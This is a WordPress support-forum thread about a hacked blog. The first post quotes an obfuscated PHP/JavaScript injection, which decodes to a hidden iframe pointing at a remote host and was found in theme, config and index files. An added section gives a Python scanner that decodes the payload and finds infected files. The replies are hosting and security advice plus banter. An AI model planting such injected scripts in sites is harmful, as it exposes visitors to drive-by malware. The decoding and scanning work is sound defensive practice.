Support » Fixing WordPress » got hacked

  • hi,
    the following script had been inserted to my blog:

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?><?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    after the insertion my website only displayed a white screen and a popup to run ActiveX was appearing. In the bottom left of the browser I was seeing a weird link saying: http://www.wp-stats-php.info/iframe/wp-stats.php
    I opened the source file and I saw that the script is found at the top and the bottom.
    I checked all my theme PHP files and the script was also there, and in my config.php and index.php too, so I deleted the script from every file where it was inserted. The problem was solved.

    NOW THE QUESTION IS HOW WAS THIS SCRIPT INSERTED AND HOW CAN IT BE AVOIDED?

    I am using WordPress 2.5 with the following plugins:
    -scf2-contact-form
    -simplemodal-contact-form-smcf
    -ibox
    -dailytop10

    thanks in advance for any clarification
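    As an added illustration (not part of the original thread, and not code from the poster or from WordPress), the injected script above is only lightly obfuscated: the `count()` function shifts every character code down by 2 and hands the result to `document.write`. The Python below decodes such payloads and walks a directory of PHP/HTML/JS files looking for the same pattern, so a site owner can list every file it was inserted into (the post mentions theme files, config.php and index.php) and see which remote address the hidden iframe points at. The sample input is the injected line quoted in the post, written into a throwaway directory; the file extensions, directory layout and regular expressions are this example's own assumptions.

```python
import os
import re
import tempfile

# The injected PHP/JS line exactly as quoted in the first post. The poster found it at the
# top and bottom of each file, so the sample repeats it twice (constructed test input).
INJECTED_LINE = (
    r"""<?php echo '<script type="text/javascript">function count(str){var res = "";"""
    r"""for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); """
    r"""res += String.fromCharCode(n - (2)); } return res; }; """
    r"""document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));"""
    r"""</script>';?>"""
)
INJECTED_SAMPLE = INJECTED_LINE * 2

# One <script> block at a time (the injection contains two of them back to back).
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.DOTALL | re.IGNORECASE)
# The decoder loop: String.fromCharCode(n - (2)) -> capture the shift amount.
SHIFT_RE = re.compile(r"String\.fromCharCode\(\s*\w+\s*-\s*\(?\s*(\d+)\s*\)?\s*\)")
# The encoded literal handed to document.write(count("...")); backslash escapes allowed inside.
PAYLOAD_RE = re.compile(r'document\.write\(\s*\w+\(\s*"((?:\\.|[^"\\])*)"\s*\)\s*\)')
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")


def decode_shifted(payload: str, shift: int) -> str:
    """Reverse the obfuscation: each output char is the input char code minus `shift`."""
    return "".join(chr(ord(c) - shift) for c in payload)


def extract_payloads(text: str) -> list:
    """Return the decoded text of every shift-obfuscated document.write() block in `text`."""
    decoded = []
    for block in SCRIPT_RE.finditer(text):
        body = block.group(1)
        shift = SHIFT_RE.search(body)
        payload = PAYLOAD_RE.search(body)
        if not (shift and payload):
            continue
        # Undo JavaScript string escapes (\" -> ") before shifting the characters back.
        raw = re.sub(r"\\(.)", r"\1", payload.group(1))
        decoded.append(decode_shifted(raw, int(shift.group(1))))
    return decoded


def extract_urls(decoded: str) -> list:
    """Pull the remote addresses out of a decoded payload (evidence for a blocklist/report)."""
    return URL_RE.findall(decoded)


def scan_tree(root: str, exts=(".php", ".html", ".htm", ".js")) -> dict:
    """Walk `root` and map each infected file (relative path) to its decoded payloads."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = extract_payloads(fh.read())
            if found:
                report[os.path.relpath(path, root)] = found
    return report


def build_demo_tree() -> str:
    """Create a throwaway directory that mimics the poster's situation (constructed files)."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    theme = os.path.join("wp-content", "themes", "mytheme")
    os.makedirs(os.path.join(root, theme))
    files = {
        "index.php": INJECTED_SAMPLE + "\n<?php require 'wp-blog-header.php'; ?>\n",
        "wp-config.php": "<?php define('DB_NAME', 'example'); ?>\n" + INJECTED_SAMPLE,
        os.path.join(theme, "header.php"): INJECTED_LINE + "<html>",
        os.path.join(theme, "style.css"): "body { color: #000; }",
        "readme.html": "<html><body>clean file</body></html>",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_demo_tree()
    for path, payloads in sorted(scan_tree(site).items()):
        print(f"{path}: {len(payloads)} injected block(s)")
        for p in payloads:
            print("   decodes to:", p)
            print("   contacts  :", ", ".join(extract_urls(p)))
```

Run against a real site root instead of the demo tree by calling `scan_tree("/path/to/wordpress")`; it only reads files, so it is safe to run on a copy taken for forensics first. The shift amount is read from the script rather than hard-coded, since the same loader is trivially re-obfuscated with a different offset.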

Viewing 15 replies - 16 through 30 (of 57 total)
  • lemme jump in on the dogpile too…

    The real problem here is PHP itself, it makes it way too easy to build websites with hard-to-find vulnerabilities, so much so that even experienced PHP coders like those at WordPress screw up periodically.

    “easy to build websites with hard to find vulnerabilities”

    I’m surprised the universe didn’t implode when you said that. If it’s easy to build… then surely it’s easier to find the vulnerabilities than if it were HARD to build with it, right?

    What’s your point anyway? You want something absolutely bug-free? Sorry it doesn’t exist.

    The more popular something becomes, the bigger a target it is. You chose wordpress because everyone thinks it’s great. That’s the same reason the hackers are after it.

    Deal, or switch to a publishing platform nobody’s ever heard of. It won’t be any more secure, but you’ll feel safer because you don’t have a big red target painted on your ass.

    Trade ease of use, compatibility and extensibility for obscurity, then we’ll see you on their forum complaining that they don’t have as many nice features as wordpress.

    All my 4 domains hosted under the same account (not all using wordpress) are now down because some guys working on wordpress didn’t have time to check their code for bugs!

    Nope. That dog won’t hunt. Your sites are down because you are probably on a shared server. It’s only as safe as the least secure user on it. That very well might be you, given your stunning ignorance of your situation, but it might be someone else on that shared server.

    Blaming WordPress for every problem you are experiencing with your WordPress and non-WordPress sites … well it just leaves me speechless. People are hacked not because they are running WordPress, but because of PHP vulnerabilities. So it’s not just a WordPress issue.

    And yeah, upgrade your damn installs when you are supposed to and spare yourself (and the rest of us) some grief.

    general unsolicited advice:

    1) pay $5 more per month and use a VPS. Having your own apartment is nicer, plus you discover wondrous new possibilities.

    2) keep your wordpress up-to-date. It’s not easy if you like to tinker, but do it anyway.

    3) research your plugins before you upload them, see if people have had any security issues with them.

    4) keep your plugins updated, and actually remove any plugins you don’t intend to use, don’t just deactivate them.

    5) read this, then read it again.

    6) actually DO what it says once you’ve read it.

    That dog won’t hunt

    wow, that’s a real saying? I thought Dr Phil was just talking out of his arse, I didn’t realise all Texans did it :P~~

    Blaming WordPress for every problem you are experiencing with your WordPress and non-WordPress sites

    the hack was made just some days after the launch of a new wordpress-powered website

    Yep. And while we’re at it:
    Y’all .. singular
    All y’all .. plural 😛

    Zizak, that could well just be a coincidence. The problem is, as I said, that in a shared hosting environment, you just can’t ever be certain HOW a hacker gained access to your site and its files. Even if he used WP to hack your site, that doesn’t necessarily mean he gained access to the server through YOU.

    Please do read the link that Ivovic posted above.

    The biggest problem I see with WP hackery and why it’s so attractive is that there are just scads of folks out there new to the web, new to having their own server space, new to WordPress, who just slap WordPress up (often via Fantastico), and then don’t think another thing about it. They don’t familiarize themselves with even the most BASIC concepts of site security. This is a hacker’s dream come true. So unless the unwashed WP masses out there EDUCATE THEMSELVES (knowledge has been and always will be power, people!), this won’t abate.

    my all-time favourite southernism is “all y’all” 😉

    as in “all y’all should get to readin’ about wordpress security”

    whooami (@whooami)

    1) pay $5 more per month and use a VPS. Having your own apartment is nicer, plus you discover wondrous new possibilities.

    hahah, yeah, right — that’s advice that’s going nowhere. We are largely, as Joni says, dealing with squabs. Cheap squabs, too. (and no you can’t have that word as it relates to WP, I plan on using it 😛).

    besides, being on shared hosting isn’t a problem, prima facie. LOTS and LOTS of people do just fine on shared hosting, and NEVER have these sorts of problems.

    that *is* true, but with people running around chmodding everything to 777… that’s gotta be reaching critical mass at some point.

    Anyway, that point wasn’t *just* about security, it is much nicer having a certain amount of allocated cpu and ram, especially now that wordpress is getting a little hungrier.

    I agree with you though… a) it’s not the most important point I’ve ever made, and b) none of these guys want to pay that much per year, let alone per month.

    whooami (@whooami)

    that *is* true, but with people running around chmodding everything to 777… that’s gotta be reaching critical mass at some point.

    that’s why those of us who are not squabs get off those shared hosts. I am all for squab-webhosting.com setting up shop.

    Let them chmod 777 all they want. 🙂

    Eventually, those people will all end up back here.

    squabsr.us is available 😉

    [offtopic]Sorry to interfere but a VPS isn’t a solution. A good shared hosting in a good hosting company is IMHO a lot safer than a cheap VPS in a bad hosting company. Especially when most people CANNOT administrate a server! That’s a hacker’s dream![/offtopic]

    whooami (@whooami)

    dueced, that is so true.

    ivovic, dude! I just found a better one that’s available, wanna go into bidness?

    I feel parasites squirming around my intestines just thinking about it… I think that’s a sign! 😉

    If I thought there was a legitimate credit card transaction among them, I’d seriously consider it.

    edit: if by chance you’re not totally joking, I’m curious 🙂

  • The topic ‘got hacked’ is closed to new replies.